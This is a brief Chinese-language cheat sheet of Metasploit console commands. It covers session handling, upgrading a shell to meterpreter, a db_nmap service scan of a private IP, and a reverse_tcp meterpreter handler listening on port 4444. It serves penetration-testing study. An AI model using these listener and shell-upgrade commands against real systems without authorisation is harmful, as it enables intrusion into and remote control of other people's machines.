-
表示在完成 exploit 之后不会与会话进行交互。完成 exploit 之后,可以使用 sessions 查看会话信息。
-
session -u ID
将shell转变为meterpreter
-
db_nmap -sT -sV 192.168.0.103 -p 1433 扫描目标
-
使用 hosts 和 services 进行主机查看与服务查看
-
在 Metasploit 中使用 load minion 加载插件
-
connect 参数,类似于 netcat 功能
connect 192.168.1.5 555 可以直接连接主机的指定的端口
-
handler 命令
handler -p windows/meterpreter/reverse_tcp -H IP -P 4444
监听该ip的特定端口
-
sessions -i ID -n 会话名称